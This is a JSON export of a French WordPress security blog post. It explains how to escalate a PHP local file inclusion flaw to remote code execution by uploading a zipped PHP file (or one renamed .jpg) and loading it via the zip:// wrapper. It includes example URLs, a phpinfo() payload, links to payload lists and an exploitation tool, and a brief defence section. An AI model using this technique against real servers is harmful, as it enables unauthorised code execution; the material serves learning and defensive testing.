{"id":1081,"date":"2023-04-01T09:37:13","date_gmt":"2023-04-01T14:37:13","guid":{"rendered":"https:\/\/www.searchevolution.com\/security\/?p=1081"},"modified":"2023-04-09T07:17:45","modified_gmt":"2023-04-09T12:17:45","slug":"vulnerabilite-dinclusion-de-fichiers-lfi-via-php-zip","status":"publish","type":"post","link":"https:\/\/www.searchevolution.com\/security\/2023\/04\/01\/vulnerabilite-dinclusion-de-fichiers-lfi-via-php-zip\/","title":{"rendered":"Exploiter une vuln\u00e9rabilit\u00e9 LFI sur un serveur php pour ex\u00e9cuter du code (RCE) avec un fichier zip"},"content":{"rendered":"\n<p>Voici un astuce pour exploiter une vuln\u00e9rabilit\u00e9 d&#8217;inclusion de fichiers LFI (local file inclusion) sur un serveur PHP qui vous permet de t\u00e9l\u00e9verser des fichiers. Il arrive souvent que certains types de fichiers sont bloqu\u00e9s pour le t\u00e9l\u00e9versement. Il faut donc trouver des solutions pour l&#8217;exploitation. Voici donc comment exploiter php avec un fichier zip.<\/p>\n\n\n\n<ul>\n<li>Se cr\u00e9er un fichier php avec du code (rce.php)<\/li>\n\n\n\n<li>Compresser ce fichier dans un archive zip (file.zip)<\/li>\n\n\n\n<li>T\u00e9l\u00e9verser ce fichier sur le serveur via un script trouv\u00e9 sur le serveur<\/li>\n\n\n\n<li>Utiliser le RCE avec http:\/\/127.0.0.1\/vuln.php?page=zip:\/\/path\/file.zip%23rce.php<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Exemple de fichiers php (payload)<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php phpinfo(); ?&gt;<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1280\" height=\"720\" src=\"https:\/\/www.searchevolution.com\/security\/wp-content\/uploads\/2023\/04\/lfi-php-zip-2.jpg\" alt=\"liste avec \u00e9tapes \u00e0 suivre pour exploiter une vuln\u00e9rabilit\u00e9 LFI dans PHP avec la m\u00e9thode zip\" class=\"wp-image-1097\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Comment exploiter si un fichier zip n&#8217;est pas autoris\u00e9<\/h2>\n\n\n\n<p>Vous pouvez bien s\u00fbr recommer le fichier en .jpg si le serveur n&#8217;accepte que des jpg -&gt; http:\/\/127.0.0.1\/vuln.php?page=zip:\/\/avatars\/myavi.jpg%23rce (<em>chemin relatif<\/em>) <strong>ou<\/strong> http:\/\/127.0.0.1\/vuln.php?page=zip:\/\/\/Library\/WebServer\/Documents\/avatars\/myavi.jpg%23rce (<em>chemin complet<\/em>)<\/p>\n\n\n\n<p>\u00c0 noter que le script va ajouter .php automatiquement -&gt; rce.php<\/p>\n\n\n\n<p>Voil\u00e0! C&#8217;\u00e9tait ma m\u00e9thode pour exploiter php avec un fichier zip. Je vous recommande la lecture de mon <a href=\"https:\/\/www.searchevolution.com\/security\/2021\/05\/24\/test-pour-des-vulnerabilites-dinclusion-de-fichiers\/\">article sur les vuln\u00e9rabilit\u00e9s d&#8217;inclusion de fichier local et distant (LFI et RFI)<\/a> pour une meilleure compr\u00e9hension globale.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Comment se d\u00e9fendre<\/h2>\n\n\n\n<p>Les vuln\u00e9rabilit\u00e9s de type LFI (Local File Inclusion) sur un serveur en PHP permettent \u00e0 un attaquant d&#8217;acc\u00e9der \u00e0 des fichiers locaux du serveur en exploitant des erreurs de configuration de l&#8217;application ou des vuln\u00e9rabilit\u00e9s dans le code PHP. En utilisant des techniques telles que l&#8217;inclusion de chemin relatif ou absolu, les attaquants peuvent acc\u00e9der \u00e0 des fichiers sensibles tels que des fichiers de configuration, des fichiers de sauvegarde ou m\u00eame des fichiers syst\u00e8me, ce qui peut entra\u00eener une compromission compl\u00e8te du serveur. Pour prot\u00e9ger contre ces vuln\u00e9rabilit\u00e9s, il est important de mettre en place des mesures de s\u00e9curit\u00e9 telles que la validation stricte des entr\u00e9es utilisateur, la configuration correcte de l&#8217;application et la limitation des droits d&#8217;acc\u00e8s aux fichiers et dossiers du serveur.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Autres ressources<\/h2>\n\n\n\n<p><a href=\"https:\/\/github.com\/payloadbox\/rfi-lfi-payload-list\" target=\"_blank\" rel=\"noreferrer noopener\">RFI\/LFI payload list<\/a> <\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/D35m0nd142\/LFISuite\">Outil pour le scan et l&#8217;exploitation des vuln\u00e9rabilit\u00e9s LFI avec diff\u00e9rentes m\u00e9thodes d&#8217;attaques LFISuite<\/a><\/p>\n\n\n\n<ul>\n<li>\/proc\/self\/neviron<\/li>\n\n\n\n<li>php:\/\/input<\/li>\n\n\n\n<li>journaux d&#8217;acc\u00e8s (log)<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Cet article permet d&#8217;\u00e9tudier la m\u00e9thode d&#8217;exploitation d&#8217;inclusion de fichiers LFI sur un serveur PHP<br \/>\nvuln\u00e9rable. Ce qui vous permettra d&#8217;ex\u00e9cuter du code avec une archive ou une image.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22,76],"tags":[71,73,75,72,74],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Exploiter une vuln\u00e9rabilit\u00e9 LFI php pour convertir en RCE avec zip<\/title>\n<meta name=\"description\" content=\"Exploiter une vuln\u00e9rabilit\u00e9 LFI sur un serveur php pour ex\u00e9cuter du code (RCE) avec un fichier zip . M\u00eame si vous ne pouvez t\u00e9l\u00e9verser un zip\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.searchevolution.com\/security\/2023\/04\/01\/vulnerabilite-dinclusion-de-fichiers-lfi-via-php-zip\/\" \/>\n<meta property=\"og:locale\" content=\"fr_CA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Exploiter une vuln\u00e9rabilit\u00e9 LFI php pour convertir en RCE avec zip\" \/>\n<meta property=\"og:description\" content=\"Exploiter une vuln\u00e9rabilit\u00e9 LFI sur un serveur php pour ex\u00e9cuter du code (RCE) avec un fichier zip . M\u00eame si vous ne pouvez t\u00e9l\u00e9verser un zip\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.searchevolution.com\/security\/2023\/04\/01\/vulnerabilite-dinclusion-de-fichiers-lfi-via-php-zip\/\" \/>\n<meta property=\"og:site_name\" content=\"S\u00e9curiser votre site\" \/>\n<meta property=\"article:published_time\" content=\"2023-04-01T14:37:13+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-04-09T12:17:45+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.searchevolution.com\/security\/wp-content\/uploads\/2023\/04\/lfi-php-zip-2.jpg\" \/>\n<meta name=\"author\" content=\"Germain\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Germain\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimation du temps de lecture\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2023\/04\/01\/vulnerabilite-dinclusion-de-fichiers-lfi-via-php-zip\/\",\"url\":\"https:\/\/www.searchevolution.com\/security\/2023\/04\/01\/vulnerabilite-dinclusion-de-fichiers-lfi-via-php-zip\/\",\"name\":\"Exploiter une vuln\u00e9rabilit\u00e9 LFI php pour convertir en RCE avec zip\",\"isPartOf\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\"},\"datePublished\":\"2023-04-01T14:37:13+00:00\",\"dateModified\":\"2023-04-09T12:17:45+00:00\",\"author\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\"},\"description\":\"Exploiter une vuln\u00e9rabilit\u00e9 LFI sur un serveur php pour ex\u00e9cuter du code (RCE) avec un fichier zip . M\u00eame si vous ne pouvez t\u00e9l\u00e9verser un zip\",\"breadcrumb\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/2023\/04\/01\/vulnerabilite-dinclusion-de-fichiers-lfi-via-php-zip\/#breadcrumb\"},\"inLanguage\":\"fr-CA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.searchevolution.com\/security\/2023\/04\/01\/vulnerabilite-dinclusion-de-fichiers-lfi-via-php-zip\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2023\/04\/01\/vulnerabilite-dinclusion-de-fichiers-lfi-via-php-zip\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.searchevolution.com\/security\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Exploiter une vuln\u00e9rabilit\u00e9 LFI sur un serveur php pour ex\u00e9cuter du code (RCE) avec un fichier zip\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\",\"url\":\"https:\/\/www.searchevolution.com\/security\/\",\"name\":\"S\u00e9curiser votre site\",\"description\":\"Conna\u00eetre son ennemi\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-CA\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\",\"name\":\"Germain\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-CA\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"caption\":\"Germain\"},\"sameAs\":[\"https:\/\/www.searchevolution.com\/security\"],\"url\":\"https:\/\/www.searchevolution.com\/security\/author\/germain\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Exploiter une vuln\u00e9rabilit\u00e9 LFI php pour convertir en RCE avec zip","description":"Exploiter une vuln\u00e9rabilit\u00e9 LFI sur un serveur php pour ex\u00e9cuter du code (RCE) avec un fichier zip . M\u00eame si vous ne pouvez t\u00e9l\u00e9verser un zip","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.searchevolution.com\/security\/2023\/04\/01\/vulnerabilite-dinclusion-de-fichiers-lfi-via-php-zip\/","og_locale":"fr_CA","og_type":"article","og_title":"Exploiter une vuln\u00e9rabilit\u00e9 LFI php pour convertir en RCE avec zip","og_description":"Exploiter une vuln\u00e9rabilit\u00e9 LFI sur un serveur php pour ex\u00e9cuter du code (RCE) avec un fichier zip . M\u00eame si vous ne pouvez t\u00e9l\u00e9verser un zip","og_url":"https:\/\/www.searchevolution.com\/security\/2023\/04\/01\/vulnerabilite-dinclusion-de-fichiers-lfi-via-php-zip\/","og_site_name":"S\u00e9curiser votre site","article_published_time":"2023-04-01T14:37:13+00:00","article_modified_time":"2023-04-09T12:17:45+00:00","og_image":[{"url":"https:\/\/www.searchevolution.com\/security\/wp-content\/uploads\/2023\/04\/lfi-php-zip-2.jpg"}],"author":"Germain","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Germain","Estimation du temps de lecture":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.searchevolution.com\/security\/2023\/04\/01\/vulnerabilite-dinclusion-de-fichiers-lfi-via-php-zip\/","url":"https:\/\/www.searchevolution.com\/security\/2023\/04\/01\/vulnerabilite-dinclusion-de-fichiers-lfi-via-php-zip\/","name":"Exploiter une vuln\u00e9rabilit\u00e9 LFI php pour convertir en RCE avec zip","isPartOf":{"@id":"https:\/\/www.searchevolution.com\/security\/#website"},"datePublished":"2023-04-01T14:37:13+00:00","dateModified":"2023-04-09T12:17:45+00:00","author":{"@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8"},"description":"Exploiter une vuln\u00e9rabilit\u00e9 LFI sur un serveur php pour ex\u00e9cuter du code (RCE) avec un fichier zip . M\u00eame si vous ne pouvez t\u00e9l\u00e9verser un zip","breadcrumb":{"@id":"https:\/\/www.searchevolution.com\/security\/2023\/04\/01\/vulnerabilite-dinclusion-de-fichiers-lfi-via-php-zip\/#breadcrumb"},"inLanguage":"fr-CA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.searchevolution.com\/security\/2023\/04\/01\/vulnerabilite-dinclusion-de-fichiers-lfi-via-php-zip\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.searchevolution.com\/security\/2023\/04\/01\/vulnerabilite-dinclusion-de-fichiers-lfi-via-php-zip\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.searchevolution.com\/security\/"},{"@type":"ListItem","position":2,"name":"Exploiter une vuln\u00e9rabilit\u00e9 LFI sur un serveur php pour ex\u00e9cuter du code (RCE) avec un fichier zip"}]},{"@type":"WebSite","@id":"https:\/\/www.searchevolution.com\/security\/#website","url":"https:\/\/www.searchevolution.com\/security\/","name":"S\u00e9curiser votre site","description":"Conna\u00eetre son ennemi","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-CA"},{"@type":"Person","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8","name":"Germain","image":{"@type":"ImageObject","inLanguage":"fr-CA","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","caption":"Germain"},"sameAs":["https:\/\/www.searchevolution.com\/security"],"url":"https:\/\/www.searchevolution.com\/security\/author\/germain\/"}]}},"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/1081"}],"collection":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/comments?post=1081"}],"version-history":[{"count":13,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/1081\/revisions"}],"predecessor-version":[{"id":1125,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/1081\/revisions\/1125"}],"wp:attachment":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/media?parent=1081"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/categories?post=1081"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/tags?post=1081"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}